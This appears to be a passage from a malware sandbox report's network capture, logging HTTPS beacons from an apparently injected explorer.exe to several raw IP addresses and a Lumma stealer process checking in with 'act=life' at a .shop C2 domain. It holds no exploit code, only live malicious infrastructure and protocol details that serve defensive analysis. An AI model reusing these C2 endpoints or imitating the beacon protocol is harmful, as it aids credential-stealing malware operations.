jxSKmUxHqj5wBdQsD5EWRBSNKimZpR5sSpBb+5UjQdSveIBxriJ0UeVzVgTWa6aekJlNzWZZ1EdsUB3r/v1P+tcHMdxrBwEdmVbTZNHcZukdtpyBP8IgwnvFIAsKVFSP8Gz8Q4/CRDVurfaanmsmOw0f73HJbPsfkfUptvn/FGb0BiHg1a0sOQeOVwnjOpqMirbGrIv6NTe7hQJAws1uvGOnwXuXhFXQaZPMdlFJXXvCoZySYg6ve0hxbEaVG+T
2024-07-24 17:57:42 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:41 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:42 UTC	685	IN	Data Raw: 59 2f 30 62 44 48 75 4b 65 4a 73 50 52 55 4e 42 48 78 73 73 53 2b 41 64 51 50 58 51 4a 6e 4c 61 4d 68 48 58 68 41 76 6b 31 32 56 73 5a 49 54 65 2f 52 50 74 42 4f 72 63 4c 77 30 58 54 35 41 32 5a 37 6c 36 4c 7a 35 77 5a 78 77 5a 76 58 74 74 71 58 30 70 6e 43 41 4e 35 74 44 4b 51 75 4b 4e 6c 6a 2b 6f 75 5a 6e 72 38 55 73 34 63 38 42 72 4a 6e 6f 65 5a 4c 38 4e 6a 37 7a 54 6b 79 4d 70 37 76 2b 54 59 49 4c 7a 4c 43 45 7a 48 44 65 71 70 53 79 77 75 35 54 36 36 75 51 50 58 6e 70 35 43 56 59 4d 45 77 68 36 42 73 59 62 73 6d 61 6b 37 62 31 62 64 46 66 46 41 6c 58 2f 34 6c 71 72 6e 72 44 4d 43 51 63 76 56 4c 45 33 50 41 71 56 50 59 66 4a 56 57 53 46 41 79 32 6c 54 4a 68 52 45 46 65 44 59 76 74 58 33 48 4a 77 79 32 6a 37 37 4a 4b 32 4d 55 34 35 44 70 65 39 31 49 41 Data Ascii: Y/0bDHuKeJsPRUNBHxssS+AdQPXQJnLaMhHXhAvk12VsZITe/RPtBOrcLw0XT5A2Z7l6Lz5wZxwZvXttqX0pnCAN5tDKQuKNlj+ouZnr8Us4c8BrJnoeZL8Nj7zTkyMp7v+TYILzLCEzHDeqpSywu5T66uQPXnp5CVYMEwh6BsYbsmak7b1bdFfFAlX/4lqrnrDMCQcvVLE3PAqVPYfJVWSFAy2lTJhREFeDYvtX3HJwy2j77JK2MU45Dpe91IA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.10	49804	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:42 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:42 UTC	1122	OUT	Data Raw: 56 4a 38 41 51 4c 6a 46 70 33 57 57 73 33 68 45 49 49 4a 4d 72 72 76 59 64 6e 6d 42 31 75 5a 30 39 4e 6e 6f 59 71 6b 6d 4d 66 6e 38 66 6c 66 79 65 41 74 35 5a 66 54 52 4a 34 45 70 66 4f 43 73 65 61 35 78 4d 75 37 65 6d 50 65 78 7a 4f 34 71 4c 51 31 67 37 72 70 2f 4e 36 7a 77 41 4c 33 46 79 48 70 41 4a 4a 64 38 2b 6e 30 66 59 38 62 30 4e 69 31 78 75 4d 69 52 33 68 57 6c 67 30 70 7a 58 42 44 42 61 36 54 2b 63 70 79 57 64 43 32 6d 65 77 63 5a 2f 70 63 42 78 45 31 62 6f 56 6d 39 71 4a 73 76 4c 57 34 6f 41 5a 52 72 4e 73 49 74 55 65 37 38 2f 77 62 6d 7a 33 30 31 33 6a 74 43 75 70 41 57 69 32 43 77 58 73 61 58 37 58 43 58 55 73 34 41 45 35 63 64 36 4a 36 67 4b 62 61 5a 44 32 67 53 49 68 73 45 4f 59 45 54 75 71 4a 32 64 30 52 6e 4e 4a 6e 48 6e 55 4b 6c 79 6f 65 Data Ascii: VJ8AQLjFp3WWs3hEIIJMrrvYdnmB1uZ09NnoYqkmMfn8flfyeAt5ZfTRJ4EpfOCsea5xMu7emPexzO4qLQ1g7rp/N6zwAL3FyHpAJJd8+n0fY8b0Ni1xuMiR3hWlg0pzXBDBa6T+cpyWdC2mewcZ/pcBxE1boVm9qJsvLW4oAZRrNsItUe78/wbmz3013jtCupAWi2CwXsaX7XCXUs4AE5cd6J6gKbaZD2gSIhsEOYETuqJ2d0RnNJnHnUKlyoe
2024-07-24 17:57:43 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:43 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:43 UTC	685	IN	Data Raw: 52 38 34 72 4a 76 4d 46 48 76 54 7a 78 43 36 34 6a 6a 61 55 54 6e 49 6f 75 6d 35 52 31 67 56 46 65 75 45 64 36 56 6d 2f 43 49 4b 6a 53 48 52 6d 67 63 66 36 54 37 4f 64 38 45 75 69 7a 42 63 4b 56 34 4f 43 4e 55 6c 6c 41 69 48 4f 48 52 47 65 4c 4b 30 76 62 36 68 35 48 41 63 54 73 38 4e 62 72 34 31 68 66 44 76 65 34 57 6c 59 78 39 5a 53 4a 51 70 56 4c 59 77 4f 74 68 75 46 56 6b 58 64 45 31 6f 33 70 73 76 42 31 67 55 77 36 31 31 49 6f 78 41 46 76 47 66 31 6e 4b 57 75 6e 66 42 76 61 71 55 31 41 42 4a 44 32 52 62 46 4b 64 76 73 53 53 4d 52 70 30 59 64 35 4e 61 4e 6f 55 41 6b 6d 46 53 37 4e 77 49 6a 59 51 49 37 58 41 56 67 32 31 66 53 6c 62 78 48 5a 48 35 35 58 2b 4f 49 76 57 6d 41 52 74 4f 65 39 70 53 6d 4c 72 57 4a 65 5a 2b 74 4c 61 30 76 50 48 4d 64 68 77 6c Data Ascii: R84rJvMFHvTzxC64jjaUTnIoum5R1gVFeuEd6Vm/CIKjSHRmgcf6T7Od8EuizBcKV4OCNUllAiHOHRGeLK0vb6h5HAcTs8Nbr41hfDve4WlYx9ZSJQpVLYwOthuFVkXdE1o3psvB1gUw611IoxAFvGf1nKWunfBvaqU1ABJD2RbFKdvsSSMRp0Yd5NaNoUAkmFS7NwIjYQI7XAVg21fSlbxHZH55X+OIvWmARtOe9pSmLrWJeZ+tLa0vPHMdhwl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.10	49803	172.67.213.85	443	7864	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:44 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: liernessfornicsa.shop
2024-07-24 17:57:44 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-07-24 17:57:45 UTC	812	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:57:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8b0v36ffggp1b1fnv5qb4ur2eu; expires=Sun, 17-Nov-2024 11:44:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jKFn%2BTUiLK%2BW2rcw8C0aGQsGPAs1yC8zJ5MccNCWneLPEblJGU9%2BQ99lLZkHcRrILYrClHi%2BGknod6D2mfLF8hqw2pwHc%2B7GLhIoXUXCkEao4i5O2ZswsawPp3vxj5Qu%2FHMLQoRL0j0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a85cb591c0c4327-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 17:57:45 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-07-24 17:57:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.10	49806	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:44 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:44 UTC	1122	OUT	Data Raw: 49 61 77 74 64 32 50 39 43 57 61 61 6c 58 72 53 35 43 75 47 4c 6a 67 50 56 58 72 76 46 68 75 71 36 71 6f 42 31 63 55 52 6e 6b 55 4d 2f 55 46 6c 64 33 56 54 53 47 4e 79 4a 6c 4e 30 4d 31 4e 6e 71 48 76 67 75 5a 56 6f 35 6d 4e 6c 61 47 44 57 6b 50 42 4e 44 51 43 63 48 78 62 6f 54 38 69 4d 6f 73 55 59 67 57 58 47 4b 79 6e 48 7a 31 50 70 4e 34 66 43 77 37 79 5a 49 51 34 7a 43 4c 70 58 7a 65 69 39 6c 54 36 4a 6a 4e 59 32 59 6b 2b 35 66 4f 39 32 66 7a 31 6c 2b 53 2f 64 2f 6d 54 57 53 31 6e 66 53 52 52 6d 43 5a 71 79 2f 4e 6f 59 72 6f 48 2b 58 36 50 65 62 36 78 5a 51 63 74 42 4e 6e 6a 41 69 70 49 65 36 30 38 53 67 46 6a 53 42 5a 4e 42 5a 49 46 6f 37 41 58 43 78 63 51 74 67 48 44 30 79 55 41 54 53 65 51 61 53 74 5a 4b 50 78 48 45 6c 48 59 34 4a 46 45 44 6d 30 79 Data Ascii: Iawtd2P9CWaalXrS5CuGLjgPVXrvFhuq6qoB1cURnkUM/UFld3VTSGNyJlN0M1NnqHvguZVo5mNlaGDWkPBNDQCcHxboT8iMosUYgWXGKynHz1PpN4fCw7yZIQ4zCLpXzei9lT6JjNY2Yk+5fO92fz1l+S/d/mTWS1nfSRRmCZqy/NoYroH+X6Peb6xZQctBNnjAipIe608SgFjSBZNBZIFo7AXCxcQtgHD0yUATSeQaStZKPxHElHY4JFEDm0y
2024-07-24 17:57:45 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:45 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:45 UTC	685	IN	Data Raw: 6d 65 73 59 71 4c 76 67 51 54 64 37 42 65 66 4a 50 53 6f 45 72 31 77 56 34 33 79 58 53 38 77 48 32 76 2f 36 49 36 55 55 45 73 73 75 73 4a 6c 58 79 77 31 73 39 43 47 6b 69 61 34 69 71 54 48 31 73 30 69 39 4f 47 6a 37 43 4c 37 65 2f 75 6d 47 36 66 62 73 33 79 53 50 6f 61 5a 6c 43 53 4d 2b 6e 62 35 46 39 36 4a 63 75 5a 66 6c 33 2b 76 72 43 6a 4c 53 43 48 62 70 51 51 56 7a 31 6f 2f 58 38 30 46 73 42 76 46 53 68 70 76 68 75 62 59 69 54 54 51 30 70 72 39 58 42 43 6d 53 75 6b 54 53 74 62 43 79 50 2b 6c 63 33 46 55 38 76 33 6b 67 59 6f 31 4f 36 31 6f 69 30 54 64 76 42 7a 51 6d 37 69 36 43 56 6f 77 37 37 79 72 45 39 42 69 36 61 65 35 35 79 37 48 67 4b 42 6b 7a 6d 7a 57 30 45 4b 46 44 66 74 6a 4e 38 75 64 68 64 37 59 75 31 2f 7a 46 45 2f 43 34 33 57 52 42 4e 49 65 Data Ascii: mesYqLvgQTd7BefJPSoEr1wV43yXS8wH2v/6I6UUEssusJlXyw1s9CGkia4iqTH1s0i9OGj7CL7e/umG6fbs3ySPoaZlCSM+nb5F96JcuZfl3+vrCjLSCHbpQQVz1o/X80FsBvFShpvhubYiTTQ0pr9XBCmSukTStbCyP+lc3FU8v3kgYo1O61oi0TdvBzQm7i6CVow77yrE9Bi6ae55y7HgKBkzmzW0EKFDftjN8udhd7Yu1/zFE/C43WRBNIe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.10	49808	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:46 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:46 UTC	1122	OUT	Data Raw: 6e 76 38 72 2b 32 62 69 2b 42 44 6d 6e 54 30 59 49 58 53 59 47 6c 4f 76 49 2b 70 54 37 4e 59 33 7a 36 61 6d 51 6d 4f 73 6b 52 56 71 53 76 70 4d 4c 76 39 43 50 6a 42 36 6a 67 6d 54 2b 47 52 33 6c 6b 6d 70 6a 45 4e 31 71 43 6c 41 43 68 4b 61 69 59 36 34 70 43 4a 33 4a 42 73 34 42 38 37 50 69 30 30 6f 41 56 4a 32 74 41 33 38 7a 45 6d 61 6e 52 46 64 4a 75 67 61 64 50 56 63 42 53 6e 2b 39 62 37 61 6e 42 47 48 34 33 51 56 48 78 31 39 61 47 50 66 50 2b 47 33 79 46 43 59 4e 73 51 45 5a 69 53 6a 47 44 73 35 68 32 55 32 4d 6f 58 37 6c 69 2f 37 46 37 31 54 31 59 79 30 55 73 7a 7a 76 70 63 55 50 54 7a 33 61 57 2b 48 73 4e 4c 69 5a 6b 6a 51 72 63 31 62 73 35 32 6a 67 75 39 74 6c 55 68 79 67 74 2f 54 61 58 4d 64 52 73 63 66 30 52 58 6c 47 49 65 73 50 4f 75 53 2b 74 77 Data Ascii: nv8r+2bi+BDmnT0YIXSYGlOvI+pT7NY3z6amQmOskRVqSvpMLv9CPjB6jgmT+GR3lkmpjEN1qClAChKaiY64pCJ3JBs4B87Pi00oAVJ2tA38zEmanRFdJugadPVcBSn+9b7anBGH43QVHx19aGPfP+G3yFCYNsQEZiSjGDs5h2U2MoX7li/7F71T1Yy0UszzvpcUPTz3aW+HsNLiZkjQrc1bs52jgu9tlUhygt/TaXMdRscf0RXlGIesPOuS+tw
2024-07-24 17:57:48 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:47 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:48 UTC	685	IN	Data Raw: 54 4f 74 77 6c 46 7a 6d 6b 50 62 30 35 6d 38 72 33 46 59 78 62 72 2b 32 6b 50 4d 42 6a 48 4b 44 2f 33 56 34 76 32 59 59 4e 4f 72 55 54 58 7a 32 6d 46 6d 52 6b 6a 58 36 6c 51 77 73 78 4c 37 53 4b 63 59 49 78 7a 4a 76 53 43 61 61 4b 63 2f 39 6f 47 70 4b 79 61 2f 55 39 38 50 57 52 65 72 78 31 34 37 45 47 70 53 30 69 37 64 65 4e 57 67 49 41 5a 6c 76 2f 57 31 78 66 4d 51 47 37 54 49 67 43 2f 33 4a 49 36 79 6c 49 67 6d 79 6e 45 46 36 4e 4d 4d 30 61 67 36 57 66 61 51 64 55 71 72 75 6d 51 69 4d 30 6c 64 41 4e 33 66 42 41 66 4e 4a 34 38 41 6f 49 4b 4b 64 62 78 62 55 59 4b 77 42 56 37 49 79 50 4e 47 57 53 4d 61 57 77 59 6d 32 73 6e 34 4a 5a 73 35 48 70 52 32 34 6c 56 4f 78 43 65 37 41 61 73 58 74 72 57 46 36 68 4f 2b 35 38 67 67 75 7a 50 7a 39 72 4a 48 31 54 61 76 Data Ascii: TOtwlFzmkPb05m8r3FYxbr+2kPMBjHKD/3V4v2YYNOrUTXz2mFmRkjX6lQwsxL7SKcYIxzJvSCaaKc/9oGpKya/U98PWRerx147EGpS0i7deNWgIAZlv/W1xfMQG7TIgC/3JI6ylIgmynEF6NMM0ag6WfaQdUqrumQiM0ldAN3fBAfNJ48AoIKKdbxbUYKwBV7IyPNGWSMaWwYm2sn4JZs5HpR24lVOxCe7AasXtrWF6hO+58gguzPz9rJH1Tav

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.10	49809	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:48 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:48 UTC	1122	OUT	Data Raw: 6f 50 6b 41 30 7a 59 6c 74 46 66 36 58 67 63 2b 4a 64 77 4a 4e 5a 55 36 49 38 77 79 4e 69 55 47 77 61 5a 61 6c 47 46 30 54 4c 63 76 61 38 48 54 68 6b 6b 4c 4c 4a 4c 59 54 35 46 63 4d 61 6f 67 73 7a 6b 64 76 30 56 6c 2b 73 4c 61 75 72 42 31 61 36 72 49 70 4d 44 30 4b 31 57 39 37 54 63 38 79 6b 51 47 51 54 44 58 64 54 45 44 65 37 67 6e 58 46 30 6f 72 70 6f 73 4e 75 6a 79 74 5a 67 4a 57 30 79 6f 4e 35 72 6e 39 65 41 58 4c 61 68 76 68 42 75 37 41 42 30 79 30 4a 67 73 34 7a 33 50 4a 71 36 6d 64 59 6e 69 45 47 4a 52 74 4c 59 56 50 58 45 48 67 5a 4f 4e 62 33 64 50 56 67 33 73 6e 4c 37 34 39 64 65 4a 4b 4e 66 66 33 71 56 76 79 2f 73 6c 4d 6d 31 70 78 6e 74 69 2f 68 4b 42 53 46 37 71 56 32 53 4b 36 31 37 73 73 4c 73 6e 73 6f 4f 56 39 4a 5a 6d 4c 73 59 39 51 65 4f Data Ascii: oPkA0zYltFf6Xgc+JdwJNZU6I8wyNiUGwaZalGF0TLcva8HThkkLLJLYT5FcMaogszkdv0Vl+sLaurB1a6rIpMD0K1W97Tc8ykQGQTDXdTEDe7gnXF0orposNujytZgJW0yoN5rn9eAXLahvhBu7AB0y0Jgs4z3PJq6mdYniEGJRtLYVPXEHgZONb3dPVg3snL749deJKNff3qVvy/slMm1pxnti/hKBSF7qV2SK617ssLsnsoOV9JZmLsY9QeO
2024-07-24 17:57:49 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:49 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:49 UTC	685	IN	Data Raw: 51 62 77 4f 65 55 68 53 59 4a 6f 2b 5a 6d 56 2b 50 2b 63 59 4b 42 6b 6b 6d 4d 70 55 74 67 42 4a 38 61 4c 4c 6b 45 35 51 42 34 48 54 77 32 2f 55 50 58 42 70 79 55 6d 43 6d 44 4b 43 4d 6e 70 7a 35 50 69 4f 30 41 46 37 67 6b 78 57 31 77 6e 77 45 63 36 64 66 57 76 67 4b 53 4f 75 4f 77 74 65 56 48 69 4e 35 6b 4a 48 45 5a 41 73 4b 31 38 35 35 4b 33 75 77 75 39 55 52 66 33 67 71 59 69 42 50 43 44 6b 49 63 43 2b 36 44 52 65 6b 6d 6c 35 6b 74 6f 59 4c 67 6d 6e 6e 6d 34 49 74 38 31 41 55 71 75 69 63 6c 35 70 53 74 6d 6f 4c 75 73 54 38 6f 4d 50 62 6d 66 66 4d 57 46 48 4f 44 48 2f 49 50 56 50 4f 32 4c 57 64 61 66 79 2f 41 64 7a 75 75 72 56 35 37 63 4b 69 53 79 79 39 4c 56 56 44 74 75 7a 39 59 34 55 31 42 66 51 57 4b 46 59 36 6a 6f 35 63 50 64 6c 31 58 49 47 46 5a 39 Data Ascii: QbwOeUhSYJo+ZmV+P+cYKBkkmMpUtgBJ8aLLkE5QB4HTw2/UPXBpyUmCmDKCMnpz5PiO0AF7gkxW1wnwEc6dfWvgKSOuOwteVHiN5kJHEZAsK1855K3uwu9URf3gqYiBPCDkIcC+6DRekml5ktoYLgmnnm4It81AUquicl5pStmoLusT8oMPbmffMWFHODH/IPVPO2LWdafy/AdzuurV57cKiSyy9LVVDtuz9Y4U1BfQWKFY6jo5cPdl1XIGFZ9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.10	49810	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:50 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:50 UTC	1122	OUT	Data Raw: 50 54 6c 56 50 55 70 57 6d 79 44 66 53 38 6f 49 4d 73 62 4f 4b 6c 56 62 73 35 59 2f 7a 7a 4d 68 38 32 4f 64 73 74 73 73 67 61 4b 72 58 37 62 67 75 33 6b 63 49 44 4b 34 38 73 4d 75 54 4b 66 45 47 56 73 4b 48 46 70 78 58 78 5a 48 33 54 31 35 70 73 77 31 39 52 6b 32 43 58 6c 38 58 31 68 57 6b 4b 5a 73 45 42 6d 30 58 30 69 47 35 64 65 71 79 66 6f 48 4a 54 2f 49 63 63 32 47 34 2b 70 37 66 7a 59 2b 4d 53 6e 31 66 52 2f 71 4f 47 67 5a 45 52 45 74 36 63 43 78 41 62 4a 56 53 36 54 48 68 34 42 41 79 4a 37 51 30 6d 75 57 54 69 48 4e 33 7a 4f 32 48 59 4e 75 54 2f 74 7a 52 54 51 4e 56 64 56 56 63 79 42 32 48 30 32 47 6d 73 41 39 32 42 33 68 74 49 70 47 2b 62 50 74 4f 43 52 50 32 2b 6a 68 47 39 4e 47 4f 38 64 74 55 69 41 45 2b 47 61 73 2f 53 76 6a 57 52 43 6f 2b 52 49 Data Ascii: PTlVPUpWmyDfS8oIMsbOKlVbs5Y/zzMh82OdstssgaKrX7bgu3kcIDK48sMuTKfEGVsKHFpxXxZH3T15psw19Rk2CXl8X1hWkKZsEBm0X0iG5deqyfoHJT/Icc2G4+p7fzY+MSn1fR/qOGgZEREt6cCxAbJVS6THh4BAyJ7Q0muWTiHN3zO2HYNuT/tzRTQNVdVVcyB2H02GmsA92B3htIpG+bPtOCRP2+jhG9NGO8dtUiAE+Gas/SvjWRCo+RI
2024-07-24 17:57:51 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:51 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:51 UTC	685	IN	Data Raw: 4a 6d 34 62 58 42 69 36 43 70 5a 77 4f 6a 4f 6f 71 4b 67 39 79 33 35 48 64 57 74 4e 49 41 38 67 37 47 46 45 50 54 5a 36 51 31 44 58 33 2b 4b 73 44 67 4f 67 63 6d 6d 57 44 33 6e 39 30 4e 52 73 64 77 36 71 57 75 52 56 65 69 68 4d 44 72 31 51 36 6e 51 75 38 4e 79 69 78 52 4e 70 4b 72 4f 6b 4b 2f 77 39 44 4b 37 57 43 76 77 58 6f 34 7a 4f 47 6b 63 63 4c 32 44 38 2f 30 45 71 6c 72 7a 62 4d 2b 2f 38 6d 2f 72 47 73 58 35 2b 61 46 4d 4e 4a 2b 4b 62 4f 35 4d 44 32 45 4b 5a 77 79 49 52 72 46 2b 55 35 6a 62 6e 6f 2b 47 51 35 4a 54 66 77 79 33 30 4b 6a 43 36 47 66 74 6d 41 73 59 42 42 4c 6b 4d 71 31 4e 4b 6e 77 48 6f 78 44 52 35 64 68 42 56 6b 2f 76 51 30 6f 75 64 43 6b 74 67 48 65 61 42 6a 4a 37 30 59 54 41 57 46 45 6b 69 4d 38 52 4c 48 69 75 45 61 35 39 4c 74 49 49 Data Ascii: Jm4bXBi6CpZwOjOoqKg9y35HdWtNIA8g7GFEPTZ6Q1DX3+KsDgOgcmmWD3n90NRsdw6qWuRVeihMDr1Q6nQu8NyixRNpKrOkK/w9DK7WCvwXo4zOGkccL2D8/0EqlrzbM+/8m/rGsX5+aFMNJ+KbO5MD2EKZwyIRrF+U5jbno+GQ5JTfwy30KjC6GftmAsYBBLkMq1NKnwHoxDR5dhBVk/vQ0oudCktgHeaBjJ70YTAWFEkiM8RLHiuEa59LtII

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.10	49811	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:52 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:52 UTC	1122	OUT	Data Raw: 6a 4e 4a 44 54 4f 54 6f 41 69 39 48 7a 41 41 78 50 33 41 50 31 65 74 7a 37 79 41 76 62 46 6d 6e 51 4c 68 44 6f 37 51 39 39 34 6c 5a 34 5a 63 2b 6b 51 2f 2f 4e 6e 50 31 59 39 5a 58 63 62 45 50 41 33 39 50 58 7a 74 64 35 62 2f 71 6e 38 45 6f 47 47 7a 65 57 38 64 73 68 67 35 55 56 59 38 75 4a 33 59 73 61 55 36 31 2b 47 4d 78 79 71 75 38 38 32 63 47 37 30 6b 52 53 79 34 4c 62 4d 6a 2b 66 54 58 6d 44 63 78 48 57 30 32 32 4a 50 50 49 75 58 7a 62 32 58 32 75 70 67 30 53 45 6a 37 64 6c 5a 5a 6a 56 6b 35 30 32 52 64 32 37 51 50 4a 48 79 46 30 43 51 53 56 4b 38 7a 38 32 68 2f 7a 6e 2b 64 4d 2f 68 68 61 49 77 41 33 72 68 77 31 50 6f 79 76 49 64 38 73 33 51 70 71 4e 57 71 77 4d 42 33 72 53 4b 44 79 41 6f 44 44 56 4f 4f 50 37 67 38 6a 58 51 4e 53 51 6e 77 33 79 56 70 Data Ascii: jNJDTOToAi9HzAAxP3AP1etz7yAvbFmnQLhDo7Q994lZ4Zc+kQ//NnP1Y9ZXcbEPA39PXztd5b/qn8EoGGzeW8dshg5UVY8uJ3YsaU61+GMxyqu882cG70kRSy4LbMj+fTXmDcxHW022JPPIuXzb2X2upg0SEj7dlZZjVk502Rd27QPJHyF0CQSVK8z82h/zn+dM/hhaIwA3rhw1PoyvId8s3QpqNWqwMB3rSKDyAoDDVOOP7g8jXQNSQnw3yVp
2024-07-24 17:57:54 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:53 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:54 UTC	685	IN	Data Raw: 47 74 4a 37 49 4c 41 32 63 68 36 79 2b 61 47 61 4b 7a 53 77 6a 4c 58 78 68 57 47 70 4f 63 4c 47 49 49 4c 6b 34 4a 7a 54 53 75 62 5a 5a 43 33 72 41 6e 5a 7a 41 73 79 6c 70 78 6a 6e 30 5a 59 44 36 6f 44 4f 2f 52 5a 42 63 61 67 4f 54 77 6a 35 58 73 45 53 6e 34 57 6c 31 74 34 66 74 32 56 70 45 39 62 4b 79 55 6c 75 58 35 55 6b 41 63 7a 58 35 2f 75 39 4e 69 4a 54 54 70 4e 32 4e 49 33 54 58 53 55 4d 79 35 33 48 7a 6d 61 69 64 63 73 4d 61 59 38 76 6e 70 50 67 52 78 4b 79 36 36 72 6e 56 41 72 46 56 41 45 36 2f 42 48 55 48 2b 7a 44 63 53 4e 4e 70 53 6a 55 4b 4a 77 78 30 35 5a 6c 78 6a 61 71 79 55 39 34 46 6d 33 43 4b 44 53 46 42 6b 4d 57 4c 4a 50 4b 45 35 36 76 4a 63 59 49 6b 49 65 48 56 46 74 43 7a 69 35 49 41 42 43 34 61 34 63 62 44 66 34 49 53 36 4f 7a 63 77 39 Data Ascii: GtJ7ILA2ch6y+aGaKzSwjLXxhWGpOcLGIILk4JzTSubZZC3rAnZzAsylpxjn0ZYD6oDO/RZBcagOTwj5XsESn4Wl1t4ft2VpE9bKyUluX5UkAczX5/u9NiJTTpN2NI3TXSUMy53HzmaidcsMaY8vnpPgRxKy66rnVArFVAE6/BHUH+zDcSNNpSjUKJwx05ZlxjaqyU94Fm3CKDSFBkMWLJPKE56vJcYIkIeHVFtCzi5IABC4a4cbDf4IS6Ozcw9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.10	49812	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:54 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
